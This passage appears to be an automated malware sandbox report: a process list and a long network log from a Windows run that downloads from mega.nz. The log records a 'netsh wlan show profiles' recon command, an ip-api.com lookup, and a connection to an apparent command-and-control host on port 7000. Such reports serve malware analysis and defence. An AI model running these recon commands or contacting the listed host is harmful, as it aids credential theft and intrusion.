ZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTUxNDA1MjQ1MzMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY3NTciIHN5c3RlbV91cHRpbWVfdGlja3M9IjE1NjE0NTg3MDUyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iODc1IiBkb3dubG9hZF90aW1lX21zPSI4Nzk3OSIgZG93bmxvYWRlZD0iMTcyODAxMDgwIiB0b3RhbD0iMTcyODAxMDgwIiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSI0NzQwNiIvPjxwaW5nIGFjdGl2ZT0iMSIgYT0iMjAiIHI9IjIwIiBhZD0iNjMyNSIgcmQ9IjYzMjUiIHBpbmdfZnJlc2huZXNzPSJ7QjI5RjM4NDItQkJBMy00NTc0LTk1OTItOUJFNTczRjM2RDAxfSIvPjwvYXBwPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIxMjQuMC4yNDc4Ljk3IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJFVVdWIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMCIgaW5zdGFsbGRhdGU9IjYzNDIiIGNvaG9ydD0icnJmQDAuMjAiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iLTEiIHJkPSItMSIgcGluZ19mcmVzaG5lc3M9IntGRUQ0QzRFNi1BMUIzLTQ3NEYtOEMyMS1CMzRBMEI1NEMwNDB9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Windows\SYSTEM32\cmd.exe

"cmd"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\uxdvyy.odt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 88.221.83.184:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 184.83.221.88.in-addr.arpa udp
BE 88.221.83.184:443 www.bing.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 131.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 clients2.google.com udp
FR 216.58.213.78:443 clients2.google.com udp
FR 216.58.213.78:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 78.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
GB 142.250.187.238:443 consent.google.com tcp
US 8.8.8.8:53 www.win-rar.com udp
DE 51.195.68.163:443 www.win-rar.com tcp
DE 51.195.68.163:443 www.win-rar.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 163.68.195.51.in-addr.arpa udp
DE 51.195.68.163:443 www.win-rar.com tcp
DE 51.195.68.163:443 www.win-rar.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
DE 51.195.68.163:443 www.win-rar.com tcp
US 8.8.8.8:53 zxx.groovesell.com udp
US 104.17.142.116:443 zxx.groovesell.com tcp
US 104.17.142.116:443 zxx.groovesell.com tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 8.8.8.8:53 core.spreedly.com udp
US 8.8.8.8:53 js.mollie.com udp
US 8.8.8.8:53 js.stripe.com udp
US 8.8.8.8:53 staxjs.staxpayments.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
US 8.8.8.8:53 js.braintreegateway.com udp
US 8.8.8.8:53 kit.fontawesome.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 js.authorize.net udp
US 151.101.1.229:443 cdn.jsdelivr.net tcp
US 104.18.40.68:443 kit.fontawesome.com tcp
US 151.101.2.182:443 core.spreedly.com tcp
US 151.101.0.176:443 js.stripe.com tcp
US 151.101.0.176:443 js.stripe.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
US 34.111.145.109:443 js.mollie.com tcp
US 104.18.17.199:443 staxjs.staxpayments.com tcp
US 104.18.13.54:443 js.authorize.net tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 ka-f.fontawesome.com udp
US 8.8.8.8:53 116.142.17.104.in-addr.arpa udp
US 8.8.8.8:53 229.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 182.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 176.0.101.151.in-addr.arpa udp
US 8.8.8.8:53 68.40.18.104.in-addr.arpa udp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 8.8.8.8:53 109.145.111.34.in-addr.arpa udp
US 8.8.8.8:53 199.17.18.104.in-addr.arpa udp
US 8.8.8.8:53 54.13.18.104.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 151.101.1.21:443 www.paypal.com tcp
US 104.21.26.223:443 ka-f.fontawesome.com tcp
US 104.21.26.223:443 ka-f.fontawesome.com tcp
US 104.21.26.223:443 ka-f.fontawesome.com tcp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 8.8.8.8:53 m.stripe.network udp
US 104.17.25.14:443 cdnjs.cloudflare.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 8.8.8.8:53 v1.gdapis.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 172.67.200.87:443 v1.gdapis.com tcp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 223.26.21.104.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 87.200.67.172.in-addr.arpa udp
DE 51.195.68.163:443 www.win-rar.com tcp
FR 172.217.20.196:443 www.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
GB 142.250.179.238:443 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.200.22:443 i.ytimg.com tcp
US 8.8.8.8:53 67.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 22.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
FR 142.250.178.142:443 www.youtube.com tcp
FR 142.250.178.142:443 www.youtube.com udp
GB 142.250.200.22:443 i.ytimg.com udp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
DE 49.12.202.237:443 www.7-zip.org tcp
US 8.8.8.8:53 142.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
FR 142.250.75.230:443 static.doubleclick.net tcp
FR 172.217.20.170:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 237.202.12.49.in-addr.arpa udp
US 8.8.8.8:53 170.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 230.75.250.142.in-addr.arpa udp
FR 216.58.213.78:443 www.youtube.com udp
FR 216.58.213.78:443 www.youtube.com tcp
FR 172.217.20.196:443 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 play.google.com udp
FR 172.217.20.174:443 play.google.com udp
FR 172.217.20.174:443 play.google.com tcp
US 8.8.8.8:53 174.20.217.172.in-addr.arpa udp
FR 216.58.213.78:443 www.youtube.com udp
FR 216.58.213.78:443 www.youtube.com tcp
GB 142.250.200.22:443 i.ytimg.com udp
GB 142.250.200.22:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 173.194.69.84:443 accounts.google.com udp
US 8.8.8.8:53 84.69.194.173.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
FR 172.217.20.174:443 play.google.com udp
FR 172.217.20.174:443 play.google.com tcp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.212.206:443 consent.youtube.com tcp
US 8.8.8.8:53 206.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
FR 216.58.214.162:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 rr2---sn-hgn7rn7r.googlevideo.com udp
FR 172.217.130.231:443 rr2---sn-hgn7rn7r.googlevideo.com tcp
FR 172.217.130.231:443 rr2---sn-hgn7rn7r.googlevideo.com tcp
US 8.8.8.8:53 162.214.58.216.in-addr.arpa udp
FR 172.217.130.231:443 rr2---sn-hgn7rn7r.googlevideo.com tcp
FR 172.217.130.231:443 rr2---sn-hgn7rn7r.googlevideo.com tcp
FR 172.217.130.231:443 rr2---sn-hgn7rn7r.googlevideo.com tcp
FR 172.217.130.231:443 rr2---sn-hgn7rn7r.googlevideo.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
FR 142.250.75.230:443 static.doubleclick.net tcp
US 8.8.8.8:53 231.130.217.172.in-addr.arpa udp
US 8.8.8.8:53 suggestqueries-clients6.youtube.com udp
GB 172.217.16.238:443 suggestqueries-clients6.youtube.com tcp
GB 172.217.16.238:443 suggestqueries-clients6.youtube.com udp
GB 172.217.16.238:443 suggestqueries-clients6.youtube.com udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
GB 142.250.200.46:443 youtube.com tcp
US 8.8.8.8:53 yt3.ggpht.com udp
FR 172.217.20.193:443 yt3.ggpht.com tcp
FR 172.217.20.193:443 yt3.ggpht.com tcp
FR 172.217.20.193:443 yt3.ggpht.com tcp
US 8.8.8.8:53 193.20.217.172.in-addr.arpa udp
FR 172.217.20.193:443 yt3.ggpht.com udp
US 8.8.8.8:53 rr5---sn-hpa7znzy.googlevideo.com udp
IT 173.194.10.10:443 rr5---sn-hpa7znzy.googlevideo.com tcp
IT 173.194.10.6:443 rr1---sn-hpa7znzy.googlevideo.com tcp
US 8.8.8.8:53 10.10.194.173.in-addr.arpa udp
US 8.8.8.8:53 6.10.194.173.in-addr.arpa udp
US 8.8.8.8:53 rr5---sn-hpa7knle.googlevideo.com udp
IT 173.194.18.74:443 rr5---sn-hpa7knle.googlevideo.com tcp
US 8.8.8.8:53 74.18.194.173.in-addr.arpa udp
IT 173.194.18.74:443 rr5---sn-hpa7knle.googlevideo.com udp
US 8.8.8.8:53 rr3---sn-hpa7kn7d.googlevideo.com udp
IT 74.125.99.168:443 rr3---sn-hpa7kn7d.googlevideo.com udp
US 8.8.8.8:53 168.99.125.74.in-addr.arpa udp
US 8.8.8.8:53 rr5---sn-hpa7znzr.googlevideo.com udp
IT 173.194.6.42:443 rr5---sn-hpa7znzr.googlevideo.com udp
US 8.8.8.8:53 rr4---sn-hpa7znz6.googlevideo.com udp
US 8.8.8.8:53 42.6.194.173.in-addr.arpa udp
IT 74.125.111.105:443 rr4---sn-hpa7znz6.googlevideo.com udp
US 8.8.8.8:53 rr1---sn-hpa7knl7.googlevideo.com udp
IT 74.125.11.70:443 rr1---sn-hpa7knl7.googlevideo.com udp
US 8.8.8.8:53 105.111.125.74.in-addr.arpa udp
US 8.8.8.8:53 70.11.125.74.in-addr.arpa udp
US 8.8.8.8:53 rr1---sn-hpa7knll.googlevideo.com udp
IT 173.194.18.134:443 rr1---sn-hpa7knll.googlevideo.com udp
US 8.8.8.8:53 rr3---sn-hpa7kn76.googlevideo.com udp
IT 74.125.99.136:443 rr3---sn-hpa7kn76.googlevideo.com udp
US 8.8.8.8:53 134.18.194.173.in-addr.arpa udp
US 8.8.8.8:53 136.99.125.74.in-addr.arpa udp
US 8.8.8.8:53 rr3---sn-hpa7knle.googlevideo.com udp
IT 173.194.18.72:443 rr3---sn-hpa7knle.googlevideo.com udp
US 8.8.8.8:53 rr3---sn-hpa7zns6.googlevideo.com udp
IT 173.194.182.168:443 rr3---sn-hpa7zns6.googlevideo.com udp
US 8.8.8.8:53 72.18.194.173.in-addr.arpa udp
US 8.8.8.8:53 168.182.194.173.in-addr.arpa udp
US 8.8.8.8:53 tinyurl.com udp
US 172.67.1.225:443 tinyurl.com tcp
US 8.8.8.8:53 mega.nz udp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 225.1.67.172.in-addr.arpa udp
US 8.8.8.8:53 5.145.216.31.in-addr.arpa udp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 eu.static.mega.co.nz udp
LU 89.44.169.132:443 eu.static.mega.co.nz tcp
LU 89.44.169.132:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.14:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 132.169.44.89.in-addr.arpa udp
US 8.8.8.8:53 14.125.203.66.in-addr.arpa udp
LU 89.44.169.132:443 eu.static.mega.co.nz tcp
LU 31.216.145.5:443 mega.nz tcp
LU 66.203.125.14:443 g.api.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 gfs270n879.userstorage.mega.co.nz udp
LU 89.44.168.139:443 gfs270n879.userstorage.mega.co.nz tcp
US 8.8.8.8:53 139.168.44.89.in-addr.arpa udp
US 8.8.8.8:53 gfs208n176.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs206n186.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs270n439.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs204n176.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs214n174.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs262n371.userstorage.mega.co.nz udp
FR 185.206.26.86:443 gfs208n176.userstorage.mega.co.nz tcp
FR 185.206.26.86:443 gfs208n176.userstorage.mega.co.nz tcp
FR 185.206.26.86:443 gfs208n176.userstorage.mega.co.nz tcp
FR 185.206.26.86:443 gfs208n176.userstorage.mega.co.nz tcp
NL 185.206.24.129:443 gfs204n176.userstorage.mega.co.nz tcp
NL 185.206.24.129:443 gfs204n176.userstorage.mega.co.nz tcp
NL 185.206.24.129:443 gfs204n176.userstorage.mega.co.nz tcp
NL 185.206.24.129:443 gfs204n176.userstorage.mega.co.nz tcp
ES 185.206.27.84:443 gfs214n174.userstorage.mega.co.nz tcp
ES 185.206.27.84:443 gfs214n174.userstorage.mega.co.nz tcp
ES 185.206.27.84:443 gfs214n174.userstorage.mega.co.nz tcp
ES 185.206.27.84:443 gfs214n174.userstorage.mega.co.nz tcp
DE 94.24.36.81:443 gfs262n371.userstorage.mega.co.nz tcp
DE 94.24.36.81:443 gfs262n371.userstorage.mega.co.nz tcp
DE 94.24.36.81:443 gfs262n371.userstorage.mega.co.nz tcp
DE 94.24.36.81:443 gfs262n371.userstorage.mega.co.nz tcp
BE 94.24.37.96:443 gfs206n186.userstorage.mega.co.nz tcp
BE 94.24.37.96:443 gfs206n186.userstorage.mega.co.nz tcp
BE 94.24.37.96:443 gfs206n186.userstorage.mega.co.nz tcp
BE 94.24.37.96:443 gfs206n186.userstorage.mega.co.nz tcp
LU 31.216.148.9:443 gfs270n439.userstorage.mega.co.nz tcp
LU 31.216.148.9:443 gfs270n439.userstorage.mega.co.nz tcp
LU 31.216.148.9:443 gfs270n439.userstorage.mega.co.nz tcp
LU 31.216.148.9:443 gfs270n439.userstorage.mega.co.nz tcp
US 8.8.8.8:53 86.26.206.185.in-addr.arpa udp
US 8.8.8.8:53 129.24.206.185.in-addr.arpa udp
US 8.8.8.8:53 81.36.24.94.in-addr.arpa udp
US 8.8.8.8:53 96.37.24.94.in-addr.arpa udp
US 8.8.8.8:53 9.148.216.31.in-addr.arpa udp
US 8.8.8.8:53 84.27.206.185.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
NL 173.194.69.84:443 accounts.google.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com tcp
GB 172.217.169.67:443 beacons.gcp.gvt2.com tcp
NL 173.194.69.84:443 accounts.google.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
ES 185.206.27.84:443 gfs214n174.userstorage.mega.co.nz tcp
ES 185.206.27.84:443 gfs214n174.userstorage.mega.co.nz tcp
ES 185.206.27.84:443 gfs214n174.userstorage.mega.co.nz tcp
ES 185.206.27.84:443 gfs214n174.userstorage.mega.co.nz tcp
FR 216.58.214.162:443 googleads.g.doubleclick.net udp
FR 142.250.178.142:443 www.youtube.com udp
FR 142.250.178.142:443 www.youtube.com tcp
FR 142.250.178.142:443 www.youtube.com tcp
NL 173.194.69.84:443 accounts.google.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
FR 172.217.20.174:443 play.google.com udp
FR 172.217.20.174:443 play.google.com tcp
DE 51.195.68.163:443 www.win-rar.com tcp
US 8.8.8.8:53 clients2.google.com udp
FR 216.58.213.78:443 clients2.google.com udp
FR 216.58.213.78:443 clients2.google.com tcp
US 8.8.8.8:53 www.rarlab.com udp
DE 51.195.68.162:443 www.rarlab.com tcp
DE 51.195.68.162:443 www.rarlab.com tcp
US 8.8.8.8:53 162.68.195.51.in-addr.arpa udp
DE 51.195.68.162:443 www.rarlab.com tcp
DE 51.195.68.162:443 www.rarlab.com tcp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 play.google.com udp
FR 172.217.20.174:443 play.google.com udp
US 8.8.8.8:53 226.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
FR 142.250.179.97:443 tpc.googlesyndication.com tcp
US 8.8.8.8:53 www.winzip.com udp
NL 23.194.209.160:443 www.winzip.com tcp
NL 23.194.209.160:443 www.winzip.com tcp
US 8.8.8.8:53 97.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 cdn.optimizely.com udp
GB 2.23.160.149:443 cdn.optimizely.com tcp
US 8.8.8.8:53 a25968344087.cdn.optimizely.com udp
BE 104.68.82.206:443 a25968344087.cdn.optimizely.com tcp
US 8.8.8.8:53 160.209.194.23.in-addr.arpa udp
US 8.8.8.8:53 149.160.23.2.in-addr.arpa udp
US 8.8.8.8:53 72.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.82.68.104.in-addr.arpa udp
US 8.8.8.8:53 www.clarity.ms udp
US 8.8.8.8:53 unpkg.com udp
US 8.8.8.8:53 installer.corel.com udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 104.17.246.203:443 unpkg.com tcp
US 13.107.246.64:443 www.clarity.ms tcp
US 107.23.42.175:443 installer.corel.com tcp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 www.corel.com udp
NL 23.194.209.160:443 www.corel.com tcp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 52.178.19.104.in-addr.arpa udp
US 8.8.8.8:53 175.42.23.107.in-addr.arpa udp
US 8.8.8.8:53 64.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 203.246.17.104.in-addr.arpa udp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 8.8.8.8:53 x.clarity.ms udp
US 104.18.32.137:443 geolocation.onetrust.com tcp
US 20.114.190.119:443 x.clarity.ms tcp
US 8.8.8.8:53 download.winzip.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
NL 23.62.61.176:443 download.winzip.com tcp
NL 23.62.61.176:443 download.winzip.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 119.190.114.20.in-addr.arpa udp
US 8.8.8.8:53 137.32.18.104.in-addr.arpa udp
US 8.8.8.8:53 176.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 www.installportal.com udp
US 44.235.254.98:443 www.installportal.com tcp
US 8.8.8.8:53 98.254.235.44.in-addr.arpa udp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 msedge.sf.dl.delivery.mp.microsoft.com udp
US 2.17.251.15:443 msedge.sf.dl.delivery.mp.microsoft.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 15.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 msedge.api.cdp.microsoft.com udp
US 13.67.191.143:443 msedge.api.cdp.microsoft.com tcp
US 8.8.8.8:53 9.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 143.191.67.13.in-addr.arpa udp
US 8.8.8.8:53 msedge.f.tlu.dl.delivery.mp.microsoft.com udp
US 199.232.210.172:80 msedge.f.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 20.114.190.119:443 x.clarity.ms tcp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 privacyportal.onetrust.com udp
US 104.18.32.137:443 privacyportal.onetrust.com tcp
US 20.114.190.119:443 x.clarity.ms tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 216.239.32.116:443 beacons4.gvt2.com tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 116.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 x.clarity.ms udp
US 20.114.190.119:443 x.clarity.ms tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 163.214.58.216.in-addr.arpa udp
FR 142.250.179.97:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 www.winzip.com udp
US 8.8.8.8:53 download.winzip.com udp
NL 23.62.61.144:443 download.winzip.com tcp
US 8.8.8.8:53 144.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 www-ezyzip-com.webpkgcache.com udp
FR 216.58.214.161:443 www-ezyzip-com.webpkgcache.com tcp
FR 216.58.214.161:443 www-ezyzip-com.webpkgcache.com udp
US 8.8.8.8:53 161.214.58.216.in-addr.arpa udp
FR 172.217.20.174:443 play.google.com udp
US 172.67.159.133:443 extract.me tcp
US 172.67.159.133:443 extract.me tcp
US 8.8.8.8:53 id.123apps.com udp
US 8.8.8.8:53 s88.extract.me udp
US 172.67.159.133:443 extract.me udp
US 8.8.8.8:53 connect.facebook.net udp
US 104.26.14.12:443 id.123apps.com tcp
DE 162.55.69.232:443 s88.extract.me tcp
US 8.8.8.8:53 apis.google.com udp
GB 163.70.151.21:443 connect.facebook.net tcp
GB 142.250.200.14:443 apis.google.com udp
US 8.8.8.8:53 133.159.67.172.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 12.14.26.104.in-addr.arpa udp
US 8.8.8.8:53 232.69.55.162.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
FR 142.250.178.138:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 www.google.co.uk udp
BE 108.177.15.155:443 stats.g.doubleclick.net tcp
US 104.26.14.12:443 id.123apps.com tcp
US 8.8.8.8:53 138.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 155.15.177.108.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 35.215.58.216.in-addr.arpa udp
US 172.67.159.133:443 extract.me udp
DE 162.55.69.232:443 s88.extract.me tcp
US 8.8.8.8:53 e2c54.gcp.gvt2.com udp
US 35.219.153.27:443 e2c54.gcp.gvt2.com tcp
US 8.8.8.8:53 27.153.219.35.in-addr.arpa udp
US 216.239.34.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:80 www.example.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 8.8.8.8:53 msedge.api.cdp.microsoft.com udp
US 20.114.58.89:443 msedge.api.cdp.microsoft.com tcp
US 8.8.8.8:53 89.58.114.20.in-addr.arpa udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 2.17.251.17:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 17.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 93.184.215.14:80 www.example.com tcp
US 8.8.8.8:53 msedge.api.cdp.microsoft.com udp
US 13.67.191.143:443 msedge.api.cdp.microsoft.com tcp
US 2.17.251.17:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
GB 191.101.209.39:7000 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 www.office.com udp
US 13.107.6.156:443 www.office.com tcp
US 8.8.8.8:53 res.cdn.office.net udp
DE 2.16.6.6:443 res.cdn.office.net tcp
DE 2.16.6.6:443 res.cdn.office.net tcp
DE 2.16.6.6:443 res.cdn.office.net tcp
DE 2.16.6.6:443 res.cdn.office.net tcp
DE 2.16.6.6:443 res.cdn.office.net tcp
DE 2.16.6.6:443 res.cdn.office.net tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 156.6.107.13.in-addr.arpa udp
US 8.8.8.8:53 6.6.16.2.in-addr.arpa udp
US 8.8.8.8:53 186.244.140.51.in-addr.arpa udp
US 8.8.8.8:53 data-edge.smartscreen.microsoft.com udp
GB 172.165.61.93:443 data-edge.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 data-edge.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 data-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 93.61.165.172.in-addr.arpa udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
US 52.182.143.211:443 browser.events.data.microsoft.com tcp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
